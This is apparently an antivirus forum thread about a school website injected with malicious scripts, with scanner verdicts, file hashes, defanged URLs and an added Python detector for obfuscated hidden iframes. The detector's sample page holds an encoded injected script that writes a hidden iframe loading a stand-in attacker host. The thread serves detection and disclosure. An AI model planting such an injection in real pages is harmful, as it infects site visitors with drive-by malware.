SMAN 1 Ternate City - Website injected

Dear All,

Another education domain that got injected with JavaScript to infect victims through this school website. Today I tried scanning with some online web scanner tools, and found that some scripts of the school website have been injected, causing visitors to be infected on each visit to this website.

Here are some locations where this website's script has been changed:

MW:IFRAME:HD28

MW:IFRAME:HD28 (Location: index.php)

Hi Yanto.Chiang,

Happens all the time; see it reported here back in 2010: http://forum.avast.com/index.php?topic=66299.0;wap2
Too much exploitable code in not fully updated web apps: http://wordpress.org/support/topic/potential-hack-attempt (poster at wordpress org three years ago = wilddeep). Proof that this is a classical hack; search Google for parts of the Suspicious Inline Scripts, and you will find many examples…
-.-
As you report (thanks for that), we see Google Diagnostic alerts on it, as do Trend Micro Site Safety Center and VScan…
The Wepawet scan does not flag it: http://wepawet.iseclab.org/view.php?hash=16e49118aefcd1098efd445ed95286ff&t=1305548724&type=js
-.-
There also is iFrame malware there:
http://wam.dasient.com/wam/infection_library/fd9cb733ad1c9972fd1f3340282d6eaf/cattww (source of write-up = Dasient Infection Library). This is cattww.com malware from 24 April last.
On an earlier similar malicious iFrame campaign, see this nice write-up from the Unmasked Parasites Blog source developer:
http://blog.unmaskparasites.com/2010/09/29/geezter-qawfer-and-other-malicious-iframes-from-121-156-57-184/
-.-
DrWeb flags it, INFECTED
htxp://sman1ternate.sch.id/ redirects to hxtp://sman1ternate.sch.id/html/index.php

Checking: htxp://sman1ternate.sch.id/Scripts/AC_RunActiveContent.js
File size: 8321 bytes
File MD5: 9b2224a10312f4ef94fca5bcefee5bdb

htxp://sman1ternate.sch.id/Scripts/AC_RunActiveContent.js - Ok

Checking: htxp://sman1ternate.sch.id/temp/transitionshow.js
File size: 5038 bytes
File MD5: 6a00ca5de507d0408bf076f7c82a39ee

htxp://sman1ternate.sch.id/temp/transitionshow.js - Ok

Checking: hxtp://sman1ternate.sch.id/html/index.php
Engine version: 5.0.2.3300
Total virus-finding records: 2090758
File size: 26.39 KB
File MD5: 237cb42071c725a41a773fbcca501523

hxtp://sman1ternate.sch.id/html/index.php - archive HTML

htxp://sman1ternate.sch.id/html/index.php/Script.0 infected with JS.IFrame.68
htxp://sman1ternate.sch.id/html/index.php/Script.1 - Ok
htxp://sman1ternate.sch.id/html/index.php/Script.2 - Ok
htxp://sman1ternate.sch.id/html/index.php/Script.3 - Ok
htxp://sman1ternate.sch.id/html/index.php/Script.4 - Ok
htxp://sman1ternate.sch.id/html/index.php/Script.5 infected with JS.IFrame.68
hxtp://sman1ternate.sch.id/html/index.php/Script.6 infected with JS.IFrame.68

Certainly the webmaster there has some updating and cleansing to do,

polonus

It also isn’t advisable to post the example script tags that could result in avast alerting on the forum topic. Best to use image examples to display any code.

Just like the attached example. As such a script might not be malicious per se, the crypted script in the example could only be there to disguise the true intentions of the malcreant, and therefore is flagged by some av solutions,

polonus
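A defender-side check of the kind the scanners in this thread run, added here as an example and not code from the thread or from any of the posters: it decodes unescape() literals inside inline scripts (the "crypted script" polonus mentions) and flags hidden off-site iframes, numbering scripts Script.N the way the DrWeb report above does. The sample page and the host evil.example are constructed for the example.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample page, not the school's real HTML: a benign inline script,
# an injected script that writes a hidden off-site iframe via unescape(), and
# an ordinary same-site iframe.  evil.example is a placeholder, not an IoC.
SAMPLE_HTML = """<html><body>
<script>var x = 1; document.getElementById('menu').style.color = 'red';</script>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fevil.example%2Fin.php%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E'));</script>
<iframe src="http://sman1ternate.sch.id/html/map.html" width="400" height="300"></iframe>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
UNESCAPE_RE = re.compile(r'unescape\(\s*(["\'])(.*?)\1\s*\)', re.I | re.S)
ATTR_RE = re.compile(r'(\w+)\s*=\s*(["\'])(.*?)\2', re.S)
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def decode_js(js):
    """Replace each unescape('...') literal with the text the browser would write."""
    return UNESCAPE_RE.sub(lambda m: unquote(m.group(2)), js)

def iframe_finding(tag, site_host):
    """Label an <iframe> that points off-site and is made invisible, else None."""
    attrs = {k.lower(): v for k, _, v in ATTR_RE.findall(tag)}
    src_host = urlparse(attrs.get("src", "")).hostname or ""
    def dim(name):  # missing or non-numeric sizes count as visible
        v = attrs.get(name, "100").strip()
        return int(v) if v.isdigit() else 100
    tiny = dim("width") <= 1 or dim("height") <= 1
    hidden = HIDDEN_RE.search(attrs.get("style", "")) is not None
    if src_host and src_host != site_host and (tiny or hidden):
        return "hidden-offsite-iframe"
    return None

def analyse(html, site_host):
    """Scan inline scripts (Script.N) and static iframes; return (finding, location) tuples."""
    findings = []
    for n, js in enumerate(SCRIPT_RE.findall(html)):
        decoded = decode_js(js)
        if decoded != js and "<iframe" in decoded.lower():
            findings.append(("obfuscated-iframe-script", f"Script.{n}"))
        for tag in IFRAME_RE.findall(decoded):
            label = iframe_finding(tag, site_host)
            if label: findings.append((label, f"Script.{n}"))
    for tag in IFRAME_RE.findall(html):  # iframes written directly in the page
        label = iframe_finding(tag, site_host)
        if label: findings.append((label, "static-html"))
    return findings
```

Running `analyse(SAMPLE_HTML, "sman1ternate.sch.id")` reports Script.1 twice (obfuscated script and hidden off-site iframe) and leaves the benign script and the same-site iframe alone.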

Hi Polonus and David,

Thank you very much for all of your advice,

We have already reported this matter to the person in charge of this school, but we have not got a reply from them yet.

Still waiting for their confirmation to change their web script.

cheers,